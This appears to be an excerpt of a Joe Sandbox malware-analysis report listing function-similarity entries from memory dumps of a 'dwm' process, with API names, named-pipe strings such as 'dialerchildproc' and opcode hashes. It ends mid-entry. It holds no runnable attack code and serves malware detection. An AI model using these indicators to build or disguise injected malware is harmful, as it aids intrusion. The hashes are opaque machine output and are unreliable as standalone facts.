                                                                                • String ID:
                                                                                • API String ID: 570795689-0
                                                                                • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction ID: cb4390f6961ed6b9396b0974b2ba38b6b8c0e1728fb321c83c064ca045ffbcea
                                                                                • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                • Instruction Fuzzy Hash: 3F41A23438138445FB6DA77D59513ED22929B8D7B8F2407A4BF364A6EEDE2FD4C19200
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                • API String ID: 2171963597-1373409510
                                                                                • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction ID: d8e38c265cc2591fed5b845a1e9ed54dacbffdcb23e87e0e2915a52c9866d07e
                                                                                • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                • Instruction Fuzzy Hash: 26213A76618B9082FB188B29F4543DAA7A0F789BA4F504255FF5903BA8CF3DC589CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction ID: 93d23abf68d1e6e82d08775b53c47137bf62e89ca0d236ad7368ba212f83e994
                                                                                • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                • Instruction Fuzzy Hash: 34E18972605B808AEB289F69D4803DE7BA4F749B98F140156FF8957B9ACB39C9C1D700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: e8bf5cb6df6ba34a33c38932158f4eac1ba22fe0c4fa4ffec722413b5d166927
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: 85E1BD72604B908AEB68DF69D4803DD7BA0F769B98F110159FF8957B9EEB36C091C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction ID: 19b8957331cd1298c4271a9cb1997f1aaf463dbead02a3c165931a55f1f852cb
                                                                                • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                • Instruction Fuzzy Hash: E741C272316B9085EB1ACBABAC107D56395B74DBE0F094165BF0A8778CEE3EC8C58314
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: e11abde77124ee2b2982e20c3ca985293e0460767c9a98d2c09261830eafcf69
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: F4412972214B8486E764CF26E4547DEB7A1F388B98F448129EF8907A5CDF39D589CB40
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,000001160CA1C7DE,?,?,?,?,?,?,?,?,000001160CA1CF9D,?,?,00000001), ref: 000001160CA1D087
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA1C7DE,?,?,?,?,?,?,?,?,000001160CA1CF9D,?,?,00000001), ref: 000001160CA1D0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA1C7DE,?,?,?,?,?,?,?,?,000001160CA1CF9D,?,?,00000001), ref: 000001160CA1D0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA1C7DE,?,?,?,?,?,?,?,?,000001160CA1CF9D,?,?,00000001), ref: 000001160CA1D0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,000001160CA1C7DE,?,?,?,?,?,?,?,?,000001160CA1CF9D,?,?,00000001), ref: 000001160CA1D0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: 343c9458720370ca65d3adc563c79ef422e7c1c82b765a0922e02fd96b50e0e3
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: B5116030B0478445FB6EA77D5A513E962429B4C7F0F5843A4BF3A466EEDE2AC4C28300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: a16568b443831e9fdc0528162ae8309fa9bca582ff67e141a8f5e22f45a5b3d1
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 8C81C3317013458AFB5CAB2EA8513D922D1A78D780F1464A5BF05C779EEB3BC9C58700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction ID: f63f1d3d351b206fec5390dcbfeb02647033de5548cb123eff403e22f2a337f1
                                                                                • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                • Instruction Fuzzy Hash: 2131C231212B50A1EF19DB6AE4207D662A4B74CBA0F590565BF1E0B7D8EF3AC4C5C310
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: e5b7830e206334787690fbe57ac68d7df4382751a717d101e60cb95e0e7407ab
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 55115831215B9086E7548B5BE864399A6A4F78CFE4F044264FF5A87BA8CB3AC8948740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID: dialer
                                                                                • API String ID: 756756679-3528709123
                                                                                • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction ID: 9b0ef131fb9825df778914c09ef9612f011c520855aab302bb387528f792e4a9
                                                                                • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                • Instruction Fuzzy Hash: 04318032702B5586EB19DF1AE5407E967A0FB48B84F084164BF4847B69EF36D4E1C700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Value$ErrorLast
                                                                                • String ID:
                                                                                • API String ID: 2506987500-0
                                                                                • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction ID: 195f7eb4e80f3f5a9b5e7a1d2f2fba48434672648ca149a1aac59ca27619103f
                                                                                • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                • Instruction Fuzzy Hash: D4119A3064138046FB6DA76E9A513ED2242AB8C7F4F1403A4BF36476EEDE2A88C19200
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                • String ID:
                                                                                • API String ID: 517849248-0
                                                                                • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction ID: ac7412eb1b92b5e920b4b7b3f8e1492db8961f8862413f30b6093098649facf0
                                                                                • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                • Instruction Fuzzy Hash: A4013531301B9482EB189B5BA8683D963A5B78CBC0F884075EF4943758DE3AC9898700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                • String ID:
                                                                                • API String ID: 449555515-0
                                                                                • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction ID: e400b6bd58958b5eebd7366823e46fc8275a67c19d542b9387363af643069dca
                                                                                • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                • Instruction Fuzzy Hash: 02016174616B4086FF289B16F8283D563A0BB4DB81F044564FF4907769EF3EC584C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 2395640692-629598281
                                                                                • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction ID: 6e4a873323f93f32762c688842e0ea3500328160282a5a2a3fd59b3d01ccc6de
                                                                                • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                • Instruction Fuzzy Hash: 6A51AF326017108AEB98CF29E858BDA37A6F348BA8F1485A4FF464774CDB36D9C1C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FinalHandleNamePathlstrlen
                                                                                • String ID: \\?\
                                                                                • API String ID: 2719912262-4282027825
                                                                                • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction ID: d3d378882cb347c693712bbda87589f3abb20c5979bc6251fe05b18d2c282b62
                                                                                • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                • Instruction Fuzzy Hash: 60F0317270475592E7648B29F8947D96760F74CB88F944060EF494655CDB3DCACDCB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CombinePath
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3422762182-91387939
                                                                                • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction ID: 15cf77f13ed283d02a1c3f009e91b876ed1fe72c2f290a3f76b1d71983edd001
                                                                                • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                • Instruction Fuzzy Hash: 32F0F874615BA482EA188F5BB9241D966A1AB4CFD0F0891A0FF5A47B2DDE39C8958700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                • API String ID: 4061214504-1276376045
                                                                                • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction ID: b84acfcdd47c5a30c6d07e30e5baf9b8b7194084d14c0ab62ff7a0d168872efb
                                                                                • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                • Instruction Fuzzy Hash: 44F062B121271482EB188B2EE4547D96320EB8CB65F540299FF6A451E8CF2EC9C48350
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentThread
                                                                                • String ID:
                                                                                • API String ID: 2882836952-0
                                                                                • Opcode ID: d3b9a58ef7fdfc98620847497ecba833532ef1df5abfce1ac3323b88e95c3dec
                                                                                • Instruction ID: 82766d938135f85c9150c498c3b7db0e43f472018681bf26083b0a62d0a00ed9
                                                                                • Opcode Fuzzy Hash: d3b9a58ef7fdfc98620847497ecba833532ef1df5abfce1ac3323b88e95c3dec
                                                                                • Instruction Fuzzy Hash: 69619536919B84C6E768CB59E45439AB7A0F3C8784F101556FF8E87BA8DB7DC4808B40
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 0a9fa6af542275ae2c9ed23ec6489d096ae3d5db8839ba6daf24dda60fdb4a87
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 87115136A10F7111F76C166ED4753E56141AB6C3B8F1806A4FF76066DECA26CCC16300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _set_statfp
                                                                                • String ID:
                                                                                • API String ID: 1156100317-0
                                                                                • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction ID: 48188c797cd57b4bfd20ce852eb8ce83f576900a31149de147f036e6788ef631
                                                                                • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                • Instruction Fuzzy Hash: 38115132AD4B5119FBAE1968E4553F921817BDC374F4887B8BF7A066FE8A2EC8474110
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                • API String ID: 3215553584-4202648911
                                                                                • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction ID: d61bcce09444ef0e9cb468f635604e665c7395d4ffb9001444836e1c197a3f9f
                                                                                • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                • Instruction Fuzzy Hash: EB61D47260074482FA6D8BA4E5443EE6AA0F7AD780F514597FB4A077ADFB37C946C300
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3544855599-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: f30031f47c9e4201120f40a79fda595582c6c5f83fe50cb60d29b2ed52fbba5d
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: 6A617B33605B888AEB28DF69D4803DD77A0F748B98F044255EF8917B9CDB39C995C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: bfb0f3dcbc16dd7e905169d3e668c372deae167db14c11ac0dde80689d6e8db8
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: DA51D0721017908AEB788F2995843D977A0F358B95F184296FF8987BDDCB3AC8D1D700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                • String ID: csm$csm
                                                                                • API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 38e0666f760a89d6c4dff4200f4d00a5fc398ccb1c012e732d9cc72801301411
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 6C51A032100380CAEB788F2595443DC7BA1F769B94F189256FB9987BE9EF3AD590D700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: 623309dcb81bcb3fa5951954a284173504c6b4767a28aa04621f8f1873a64e7e
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: CC5198326117008AEB28CB59E444BD937A9F368B98F5185A4FB16437CCFF36D881CB08
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415177632.000001160C9E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001160C9E0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160c9e0000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: b181be0b8d49ca97ed7d0a6d3859fa4ab53a0d211e4af4790d495e7bba5ae1b9
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 35316632211740DAE718DB5AE844BD977A8F368B98F568494BF5A0778CEF3AC941C708
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction ID: 8d24d1c379ff5b064a00ca85a71021c8e834ae956c23c3106a98b4ba8d6802d4
                                                                                • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                                • Instruction Fuzzy Hash: C3D1F172714B9089E719CFAAD4503DC3BB1F3587A8F008256EF5A97B9DDA36C886C340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: a3043cd912496fb9cf00b2b0c11219ccbd7e8c2f02d13331619f4e360109a67b
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: CD012532602FA0C6E708DB6BA9142CAA7A0F78CF81F084425FF4A43729DE39D8918740
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction ID: 37e265badc22bf542196fdd943f68fcf59ce937976325ab88c9d13ff92c57310
                                                                                • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                                • Instruction Fuzzy Hash: C691B37270076485F7689F6E94603ED2BA0B75CBA8F144289FF0A57A9DDB36C8C2C700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000001F.00000002.3415224759.000001160CA10000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001160CA10000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_31_2_1160ca10000_dwm.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
